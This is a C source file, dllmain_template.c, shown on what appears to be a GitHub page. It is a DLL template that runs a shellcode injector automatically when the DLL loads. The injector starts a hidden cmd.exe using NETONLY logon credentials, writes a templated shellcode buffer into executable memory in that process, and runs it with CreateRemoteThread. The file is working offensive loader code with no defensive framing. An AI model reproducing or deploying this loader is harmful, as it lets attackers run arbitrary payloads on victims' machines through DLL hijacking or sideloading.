-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathdllmain_template.c
52 lines (44 loc) · 1.23 KB
/
dllmain_template.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
%%BUFFER%%
DWORD WINAPI RunMe()
{
HANDLE pHandle;
PVOID remoteBuffer;
STARTUPINFO SI = { 0 };
PROCESS_INFORMATION PI = { 0 };
ZeroMemory(&SI, sizeof(SI));
SI.cb = sizeof(SI);
ZeroMemory(&PI, sizeof(PI));
SI.dwFlags = 1;
SI.wShowWindow = 0;
if(!CreateProcessWithLogonW(L"aaa", L"bbb", L"ccc", 0x00000002, L"C:\\Windows\\System32\\cmd.exe", NULL, 0x04000000, NULL, L"c:\\windows\\system32\\", &SI, &PI)) {
return 0;
}
pHandle = PI.hProcess;
remoteBuffer = VirtualAllocEx(pHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
if (remoteBuffer != NULL)
{
WriteProcessMemory(pHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
}
CloseHandle(pHandle);
CloseHandle(PI.hThread);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
switch( dwReason )
{
case DLL_PROCESS_ATTACH:
RunMe();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return FALSE;
}